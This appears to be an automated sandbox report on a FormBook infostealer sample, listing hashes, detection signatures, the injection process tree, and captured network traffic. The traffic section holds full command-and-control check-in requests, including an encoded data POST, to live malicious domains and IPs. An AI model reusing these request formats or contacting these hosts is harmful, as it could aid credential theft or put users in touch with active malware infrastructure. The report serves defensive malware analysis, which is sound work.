Edit tour

Windows Analysis Report
25IvlOVEB1.exe

Overview

General Information

Sample name:	25IvlOVEB1.exe renamed because original name is a hash value
Original sample name:	09fa5543a2a9ea0c677e5a79f84728f7af4c08dc519808117a6ef99021636307.exe
Analysis ID:	1588320
MD5:	946477da917ede9b7e4b05baaf618d9e
SHA1:	89669539d9283a6be114c09f241b162243ea1030
SHA256:	09fa5543a2a9ea0c677e5a79f84728f7af4c08dc519808117a6ef99021636307
Tags:	exeFormbookuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

25IvlOVEB1.exe (PID: 7000 cmdline: "C:\Users\user\Desktop\25IvlOVEB1.exe" MD5: 946477DA917EDE9B7E4B05BAAF618D9E)

svchost.exe (PID: 4072 cmdline: "C:\Users\user\Desktop\25IvlOVEB1.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

CsyVZPSRWzlUG.exe (PID: 2960 cmdline: "C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

newdev.exe (PID: 5720 cmdline: "C:\Windows\SysWOW64\newdev.exe" MD5: 4C2EACBE19E43DCEC83534AE1A8738B8)

CsyVZPSRWzlUG.exe (PID: 992 cmdline: "C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 2872 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.4049320310.0000000000870000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.4050165664.0000000004560000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2966520608.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2968336091.00000000062B0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.4050217084.00000000045B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.4048784369.0000000000890000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.4050246258.0000000002610000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2967226346.0000000003E50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\25IvlOVEB1.exe", CommandLine: "C:\Users\user\Desktop\25IvlOVEB1.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\25IvlOVEB1.exe", ParentImage: C:\Users\user\Desktop\25IvlOVEB1.exe, ParentProcessId: 7000, ParentProcessName: 25IvlOVEB1.exe, ProcessCommandLine: "C:\Users\user\Desktop\25IvlOVEB1.exe", ProcessId: 4072, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\25IvlOVEB1.exe", CommandLine: "C:\Users\user\Desktop\25IvlOVEB1.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\25IvlOVEB1.exe", ParentImage: C:\Users\user\Desktop\25IvlOVEB1.exe, ParentProcessId: 7000, ParentProcessName: 25IvlOVEB1.exe, ProcessCommandLine: "C:\Users\user\Desktop\25IvlOVEB1.exe", ProcessId: 4072, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T00:07:12.189690+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49988	104.21.32.1	80	TCP
2025-01-11T00:07:35.804186+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49992	64.46.102.238	80	TCP
2025-01-11T00:07:49.174389+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	49997	104.21.32.1	80	TCP
2025-01-11T00:08:02.399400+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	50001	13.248.169.48	80	TCP
2025-01-11T00:08:16.172945+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	50005	103.249.106.91	80	TCP
2025-01-11T00:08:29.676763+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	50009	69.57.163.64	80	TCP
2025-01-11T00:08:43.185400+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.6	50013	173.208.249.155	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 25IvlOVEB1.exe	Virustotal: Detection: 46%			Perma Link
Source: 25IvlOVEB1.exe	ReversingLabs: Detection: 60%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4049320310.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4050165664.0000000004560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2966520608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2968336091.00000000062B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4050217084.00000000045B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4048784369.0000000000890000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4050246258.0000000002610000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2967226346.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 25IvlOVEB1.exe

Joe Sandbox ML: detected

Source: 25IvlOVEB1.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CsyVZPSRWzlUG.exe, 00000007.00000002.4049565934.0000000000CEE000.00000002.00000001.01000000.00000005.sdmp, CsyVZPSRWzlUG.exe, 00000009.00000002.4050496147.0000000000CEE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: 25IvlOVEB1.exe, 00000000.00000003.2180759014.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, 25IvlOVEB1.exe, 00000000.00000003.2181914007.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2869883163.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2966839855.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2871497108.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2966839855.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000008.00000002.4050502495.000000000496E000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000008.00000002.4050502495.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000008.00000003.2966847006.0000000004466000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000008.00000003.2969739068.000000000461C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 25IvlOVEB1.exe, 00000000.00000003.2180759014.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, 25IvlOVEB1.exe, 00000000.00000003.2181914007.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2869883163.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2966839855.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2871497108.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2966839855.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000008.00000002.4050502495.000000000496E000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000008.00000002.4050502495.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, newdev.exe, 00000008.00000003.2966847006.0000000004466000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000008.00000003.2969739068.000000000461C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: NewDev.pdbGCTL source: svchost.exe, 00000002.00000003.2934769945.000000000342A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2934754689.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2934637581.000000000341B000.00000004.00000020.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000007.00000002.4049277555.000000000095E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: NewDev.pdb source: svchost.exe, 00000002.00000003.2934769945.000000000342A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2934754689.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2934637581.000000000341B000.00000004.00000020.00020000.00000000.sdmp, CsyVZPSRWzlUG.exe, 00000007.00000002.4049277555.000000000095E000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000D445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_000D445A
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000DC6D1 FindFirstFileW,FindClose,	0_2_000DC6D1
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000DC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_000DC75C
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000DEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_000DEF95
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000DF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_000DF0F2
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000DF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_000DF3F3
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000D37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_000D37EF
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000D3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_000D3B12
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_000DBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_000DBCBC

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50009 -> 69.57.163.64:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49988 -> 104.21.32.1:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50013 -> 173.208.249.155:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49992 -> 64.46.102.238:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49997 -> 104.21.32.1:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50001 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50005 -> 103.249.106.91:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.topkapiescortg.xyz
Source:	DNS query: www.8686206.xyz
Source:	DNS query: www.growbamboo.xyz

Source: Joe Sandbox View	IP Address: 69.57.163.64 69.57.163.64
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Source: Joe Sandbox View	ASN Name: FORTRESSITXUS FORTRESSITXUS
Source: Joe Sandbox View	ASN Name: DATAGRAMUS DATAGRAMUS
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: WIIUS WIIUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000E22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_000E22EE

Source: global traffic	HTTP traffic detected: GET /cz1i/?cHdXN=988T3LsXMJJH2nc&kPJ4bZ=lCWtxBlDPSCNJhR0+19OuJUUN4TPzQ9GmK+Kme085vCDtUrqSJqQP+UtwYINSw3lRTDSNZCzyCPLZyeariLfkns3ycLPJ7dd0goSQpwFZQaHlmzS5XOrg/IMpHLndMei1cnf+as= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.topkapiescortg.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /4e0r/?kPJ4bZ=QT7390Zj1CMJ3HXZrGeN4EAmJbS0Q78DLI8P1UXKji+VvkgG1NYkqFCcU0D6dMabZFhcgMAZgOWRTpEkDoRZObnAtKSbK/tYjp8uZanJfEmCFVgpAUq3InqUAbbh39nPBUu+z58=&cHdXN=988T3LsXMJJH2nc HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.dadu89.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /3vdc/?cHdXN=988T3LsXMJJH2nc&kPJ4bZ=vh8Uzz9OV8fhtH1meqE382RNszCOVpONbZRjfq/B9uLstFCNE3abmEu4DqeFZKdG1EFxV7BY8Pk1G/TVKAGyDG9O4gm487ojHWjIBSjIyrwvajxFI/Xm2dfZY0oucSMge7jdbTw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.masterqq.proConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /wfhx/?kPJ4bZ=UOoh4KWgwd2uK2Fv/Y1dgfL/8dbcrZUnUaCbH/KIeaCVkdBdb+xIXB95VKjrucq/x/UHPGjJtfXL4g7pUq+6Gw82pv1ZnniYkrWC0OZFP+5EUlQNbciF2fEf2sN//T48Iuc7ZyI=&cHdXN=988T3LsXMJJH2nc HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.shipley.groupConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ee0m/?cHdXN=988T3LsXMJJH2nc&kPJ4bZ=NHwLdo+0jCxtc5CMzIw414F1hBe8Rgh0gZLzRNbcc711dto5H4xmohMbIzAu7+z3xUnofEY5EO/2HGiLPESvf5/iyPfqyBnB3f9+h0VfvTzsaTNCRAbWAe36t302UentalrYUm4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.8686206.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /qr23/?kPJ4bZ=cmwULCeb5vBqCUjx/uOSVF44l6pPziJIygE7Dv7gwkae7g9H6YzoH0RbSyX7UnDOvFBsRzU5R5Pbc7KwiQ77stDaGRyL1NSUiRLXLX6WXOUnvs2WLQmgh9MPvCfxDS33WR2Thxo=&cHdXN=988T3LsXMJJH2nc HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.expertguide.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /e948/?cHdXN=988T3LsXMJJH2nc&kPJ4bZ=OI9Cl4brfnKnEU4iz0SiaxRa9h1FDMDvQ4DRdccrsueMHwTXZC0uGTlQqvZMtZjxNZZWYO9eSaARepBsGdBKuQ+lt96Nu4y5aB841AjeaGyZFFzppkHuNwNXfZrWKvYHi/gwd9U= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Host: www.growbamboo.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.topkapiescortg.xyz
Source: global traffic	DNS traffic detected: DNS query: www.dadu89.org
Source: global traffic	DNS traffic detected: DNS query: www.masterqq.pro
Source: global traffic	DNS traffic detected: DNS query: www.shipley.group
Source: global traffic	DNS traffic detected: DNS query: www.8686206.xyz
Source: global traffic	DNS traffic detected: DNS query: www.expertguide.info
Source: global traffic	DNS traffic detected: DNS query: www.growbamboo.xyz

Source: unknown

HTTP traffic detected: POST /4e0r/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dadu89.orgOrigin: http://www.dadu89.orgConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 211Cache-Control: max-age=0Referer: http://www.dadu89.org/4e0r/User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36Data Raw: 6b 50 4a 34 62 5a 3d 64 52 54 58 2b 44 51 45 39 32 63 69 32 6a 37 67 6f 42 58 63 78 55 6b 70 43 6f 69 74 59 37 51 33 45 74 4e 6a 39 33 54 6c 67 46 4b 73 73 69 55 78 77 5a 55 76 2f 46 71 79 4c 48 2f 54 52 63 6e 6e 45 58 45 2b 6b 4a 31 65 75 2f 47 4e 66 72 59 47 65 61 52 57 65 36 79 44 34 4b 71 69 61 76 38 4a 6a 50 46 35 59 75 33 5a 64 53 6e 32 49 58 49 42 42 45 71 63 4d 6b 75 2f 5a 74 54 46 78 74 37 55 4a 57 47 2f 30 38 58 70 62 2b 36 37 66 44 51 66 71 6a 2f 7a 6d 2b 49 6e 38 75 50 69 71 4c 74 44 47 4e 4b 50 6a 41 42 6f 4a 49 6f 53 78 6c 52 46 54 59 4a 48 33 4c 63 73 6e 72 51 69 6f 6e 33 4e 6e 67 4b 77 6d 72 39 52 63 41 44 59 Data Ascii: kPJ4bZ=dRTX+DQE92ci2j7goBXcxUkpCoitY7Q3EtNj93TlgFKssiUxwZUv/FqyLH/TRcnnEXE+kJ1eu/GNfrYGeaRWe6yD4Kqiav8JjPF5Yu3ZdSn2IXIBBEqcMku/ZtTFxt7UJWG/08Xpb+67fDQfqj/zm+In8uPiqLtDGNKPjABoJIoSxlRFTYJH3LcsnrQion3NngKwmr9RcADY

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 23:07:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cachecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z7qHwblsEi8WR4waAnrRbwLU2ukd1wMJb7zx1WYtaLrgd0zK6wXqz%2BwzegMtMO%2BGpGYpEvuzNB5xW%2Bx7Oc0P9LkNZHO%2FqXvYFwybI4iuUnpOMHzdllEl6l4BtW2DvHLYarueILqvuTXL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 900052678e978cda-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1796&min_rtt=1796&rtt_var=898&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=502&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 23:07:28 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
